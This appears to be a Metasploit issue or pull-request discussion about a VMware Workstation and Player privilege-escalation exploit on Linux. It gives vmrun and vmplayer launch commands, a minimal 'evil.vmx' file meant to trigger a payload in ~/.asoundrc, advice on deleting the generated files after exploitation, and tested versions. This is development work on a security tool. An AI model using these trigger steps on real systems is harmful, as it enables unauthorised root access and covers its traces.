Metasploit-framework: VMWare Workstation Priv Esc

Next, in the VMWare Workstation UI, open a VM with a virtual sound card and start it.

Not a blocker, but it's a notable requirement. Can probably use vmrun or whatever.

You can launch virtual machines with Workstation using:

vmrun -T ws start /path/to/vm/evil.vmx

It's worth noting that this issue affects both VMWare Workstation and VMWare player.

You can launch virtual machines with Player using:

vmplayer /path/to/vm/evil.vmx

This might be useful in instances where VMWare player is registered, however VMWare workstation is not. Unregistered Workstation cannot open VMs.

This barebones VMX file is sufficient to trigger the payload in ~/.asoundrc :

.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "11"
scsi0.present = "TRUE"
memsize = "4"
ide0:0.present = "FALSE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
vmci0.present = "TRUE"
hpet0.present = "TRUE"
displayName = "evil"
guestOS = "other"
nvram = "evil.nvram"
virtualHW.productCompatibility = "hosted"
gui.exitOnCLIHLT = "FALSE"
powerType.powerOff = "soft"
powerType.powerOn = "soft"
powerType.suspend = "soft"
powerType.reset = "soft"
floppy0.present = "FALSE"

The VMX should be placed in a directory that will be deleted after exploitation, as VMWare will automatically generate a bunch of files in the same directory as the vmx.

$ ls -lah evil
total 4.3M
drwxr-xr-x 3 user user 4.0K Jun 18 08:41 .
drwxr-xr-x 4 user user 4.0K Jun 18 08:41 ..
-rw------- 1 user user 4.0M Jun 18 08:41 564d802f-e41a-1e84-d10e-57dedf741002.vmem
drwxrwxrwx 2 user user 4.0K Jun 18 08:41 564d802f-e41a-1e84-d10e-57dedf741002.vmem.lck
-rw------- 1 user user 8.5K Jun 18 08:41 evil.nvram
-rw-r--r-- 1 user user    0 Jun 18 08:41 evil.vmsd
-rwxr-xr-x 1 user user 1.1K Jun 18 08:41 evil.vmx
-rw-r--r-- 1 user user  259 Jun 18 08:41 evil.vmxf
-rw-r--r-- 1 user user 130K Jun 18 08:41 vmware.log

Here's an exploit

Verified on VMware 11.1.2 on Linux Mint and 12.5.0 on Debian Linux.

PR #8581

Added in #8581